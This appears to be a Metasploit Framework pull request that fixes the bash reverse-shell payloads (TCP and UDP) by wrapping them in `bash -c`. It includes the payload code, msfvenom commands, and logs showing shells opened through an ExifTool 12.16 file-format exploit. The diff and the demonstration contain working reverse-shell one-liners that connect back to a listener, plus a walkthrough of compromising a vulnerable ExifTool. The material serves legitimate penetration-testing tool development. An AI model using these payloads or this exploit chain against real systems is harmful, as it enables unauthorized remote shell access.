### PR TITLE
Bash payload works outside of bash context

### DIFF
--- a/modules/exploits/unix/fileformat/metasploit_msfvenom_apk_template_cmd_injection.rb
+++ b/modules/exploits/unix/fileformat/metasploit_msfvenom_apk_template_cmd_injection.rb
@@ -42,7 +42,12 @@ class MetasploitModule < Msf::Exploit::Remote
         },
         'Targets' => [[ 'Automatic', {}]],
         'Privileged' => false,
-        'DisclosureDate' => '2020-10-29'
+        'DisclosureDate' => '2020-10-29',
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [SCREEN_EFFECTS]
+        }
       )
     )
     register_options([
@@ -72,7 +77,6 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def exploit
-    print_warning('Warning: bash payloads are unlikely to work') if datastore['PAYLOAD'].include?('bash')
     apk = Rex::Zip::Jar.new
     apk.build_manifest
     cert, key = generate_signing_material

--- a/modules/payloads/singles/cmd/unix/reverse_bash.rb
+++ b/modules/payloads/singles/cmd/unix/reverse_bash.rb
@@ -50,7 +50,7 @@ module MetasploitModule
   #
   def command_string
     fd = rand(200) + 20
-    return "0<&#{fd}-;exec #{fd}<>/dev/tcp/#{datastore['LHOST']}/#{datastore['LPORT']};sh <&#{fd} >&#{fd} 2>&#{fd}";
+    return "bash -c '0<&#{fd}-;exec #{fd}<>/dev/tcp/#{datastore['LHOST']}/#{datastore['LPORT']};sh <&#{fd} >&#{fd} 2>&#{fd}'";
     # same thing, no semicolons
     #return "/bin/bash #{fd}<>/dev/tcp/#{datastore['LHOST']}/#{datastore['LPORT']} <&#{fd} >&#{fd}"
     # same thing, no spaces

--- a/modules/payloads/singles/cmd/unix/reverse_bash_udp.rb
+++ b/modules/payloads/singles/cmd/unix/reverse_bash_udp.rb
@@ -53,7 +53,7 @@ module MetasploitModule
   #
   def command_string
     fd = rand(200) + 20
-    return "0<&#{fd}-;exec #{fd}<>/dev/udp/#{datastore['LHOST']}/#{datastore['LPORT']};echo>&#{fd};sh <&#{fd} >&#{fd} 2>&#{fd}";
+    return "bash -c '0<&#{fd}-;exec #{fd}<>/dev/udp/#{datastore['LHOST']}/#{datastore['LPORT']};echo>&#{fd};sh <&#{fd} >&#{fd} 2>&#{fd}'";
 
     # no semicolons
     #return "sh -i >& /dev/udp/#{datastore['LHOST']}/#{datastore['LPORT']} 0>&1"


### PR DESCRIPTION
This resolves #15191. The chosen solution is to prepend `bash -c` to the payload, and quote it. 

## Verification

List the steps needed to make sure this thing works

- [x] Create a payload using `msfvenom -p cmd/unix/reverse_bash lhost=127.0.0.1 lport=1234`
- [x] Start `msfconsole`
- [x] In MSF: `handler -P 1234 -H 0.0.0.0 -p cmd/unix/reverse_bash`
- [x] Launch a different shell (e.g. `sh`)
- [x] Run the command output by msfvenom
- [x] Repeat these steps for the `cmd/unix/reverse_bash_udp` payload type
- [x] Test the payload in a real setting (e.g. `exploit/unix/fileformat/exiftool_djvu_ant_perl_injection`)
  - Vulnerable version: use http://backpan.perl.org/authors/id/E/EX/EXIFTOOL/Image-ExifTool-12.16.tar.gz to test

## Demonstration

To test this directly:

### TCP

```
user@host:~/git/metasploit-framework$ ./msfvenom -p cmd/unix/reverse_bash lhost=127.0.0.1 lport=1234
[-] No platform was selected, choosing Msf::Module::Platform::Unix from the payload
[-] No arch selected, selecting arch: cmd from the payload
No encoder specified, outputting raw payload
Payload size: 68 bytes
bash -c '0<&77-;exec 77<>/dev/tcp/127.0.0.1/1234;sh <&77 >&77 2>&77'
user@host:~/git/metasploit-framework$ sh
$ bash -c '0<&77-;exec 77<>/dev/tcp/127.0.0.1/1234;sh <&77 >&77 2>&77'
bash: redirection error: cannot duplicate fd: Bad file descriptor
bash: 77: Bad file descriptor

<terminal hangs>

In MSF:

msf6 exploit(unix/fileformat/exiftool_djvu_ant_perl_injection) > handler -P 1234 -H 0.0.0.0 -p cmd/unix/reverse_bash
[*] Payload handler running as background job 3.
msf6 exploit(unix/fileformat/exiftool_djvu_ant_perl_injection) > 
[*] Started reverse TCP handler on 0.0.0.0:1234 

msf6 exploit(unix/fileformat/exiftool_djvu_ant_perl_injection) > [*] Command shell session 5 opened (127.0.0.1:1234 -> 127.0.0.1:51092 ) at 2021-11-15 16:14:39 +1100
sessions 5
[*] Starting interaction with 5...

whoami
user

```

### UDP

```
user@host:~/git/metasploit-framework$ ./msfvenom -p cmd/unix/reverse_bash_udp lhost=127.0.0.1 lport=1235
[-] No platform was selected, choosing Msf::Module::Platform::Unix from the payload
[-] No arch selected, selecting arch: cmd from the payload
No encoder specified, outputting raw payload
Payload size: 77 bytes
bash -c '0<&31-;exec 31<>/dev/udp/127.0.0.1/1235;echo>&31;sh <&31 >&31 2>&31'
user@host:~/git/metasploit-framework$ sh
$ bash -c '0<&31-;exec 31<>/dev/udp/127.0.0.1/1235;echo>&31;sh <&31 >&31 2>&31'
bash: redirection error: cannot duplicate fd: Bad file descriptor
bash: 31: Bad file descriptor

In MSF:

msf6 exploit(unix/fileformat/exiftool_djvu_ant_perl_injection) > handler -P 1235 -H 0.0.0.0 -p cmd/unix/reverse_bash_udp
[*] Payload handler running as background job 4.
msf6 exploit(unix/fileformat/exiftool_djvu_ant_perl_injection) > 
[*] Started reverse UDP handler on 0.0.0.0:1235 

msf6 exploit(unix/fileformat/exiftool_djvu_ant_perl_injection) > [*] Command shell session 6 opened (0.0.0.0:1235 -> 127.0.0.1:50624 ) at 2021-11-15 16:17:30 +1100
sessions 6
[*] Starting interaction with 6...

whoami
user

```


To test this in a real situation, I created a new user with the default shell of `/bin/sh`, and tested the issue for which this bug was initially reported.

I created `broke.jpg` prior to this fix, with a `cmd/unix/reverse_bash` payload, and `workingtcp.jpg` and `workingudp.jpg` after it.

```
msf6 exploit(unix/fileformat/exiftool_djvu_ant_perl_injection) > jobs

Jobs
====

  Id  Name                    Payload                    Payload opts
  --  ----                    -------                    ------------
  0   Exploit: multi/handler  cmd/unix/reverse_bash      tcp://0.0.0.0:2324
  2   Exploit: multi/handler  cmd/unix/reverse_bash_udp  udp://0.0.0.0:2345
```

### Before the fix

```
$ ./exiftool /tmp/broke.jpg     
sh: 1: Syntax error: Bad fd number
ExifTool Version Number         : 12.16
File Name                       : broke.jpg
Directory                       : /tmp
File Size                       : 2.5 KiB
File Modification Date/Time     : 2021:11:15 13:58:37+11:00
File Access Date/Time           : 2021:11:15 13:58:49+11:00
File Inode Change Date/Time     : 2021:11:15 13:58:37+11:00
File Permissions                : rw-rw-r--
File Type                       : JPEG (multi-page)
File Type Extension             : jpg
MIME Type                       : image/jpeg
Exif Byte Order                 : Big-endian (Motorola, MM)
Subfile Type                    : Single-page image
DjVu Version                    : 0.24
Spatial Resolution              : 100
Gamma                           : 2.2
Orientation                     : Unknown (0)
Included File ID                : shared_anno.iff
Author                          : .
X Resolution                    : 72
Y Resolution                    : 72
Resolution Unit                 : inches
Y Cb Cr Positioning             : Centered
Image Width                     : 8
Image Height                    : 8
Encoding Process                : Baseline DCT, Huffman coding
Bits Per Sample                 : 8
Color Components                : 3
Y Cb Cr Sub Sampling            : YCbCr4:2:0 (2 2)
Image Size                      : 8x8
Megapixels                      : 0.000064
$ <process ended; new prompt>
```

### After the fix, Reverse Bash TCP

```
$ ./exiftool /tmp/workingtcp.jpg
bash: redirection error: cannot duplicate fd: Bad file descriptor
bash: 192: Bad file descriptor

<terminal hangs>

In MSF:

msf6 exploit(unix/fileformat/exiftool_djvu_ant_perl_injection) > [*] Command shell session 3 opened (192.168.1.206:2324 -> 192.168.1.206:51842 ) at 2021-11-15 16:07:06 +1100
sessions 3
[*] Starting interaction with 3...

whoami
test
```

### After the fix, Reverse Bash UDP

```
$ ./exiftool /tmp/workingudp.jpg
bash: redirection error: cannot duplicate fd: Bad file descriptor
bash: 206: Bad file descriptor

<terminal hangs>

In MSF:

msf6 exploit(unix/fileformat/exiftool_djvu_ant_perl_injection) > [*] Command shell session 4 opened (0.0.0.0:2345 -> 192.168.1.206:40553 ) at 2021-11-15 16:10:23 +1100
sessions 4
[*] Starting interaction with 4...

pwd
/tmp/Image-ExifTool-12.16
```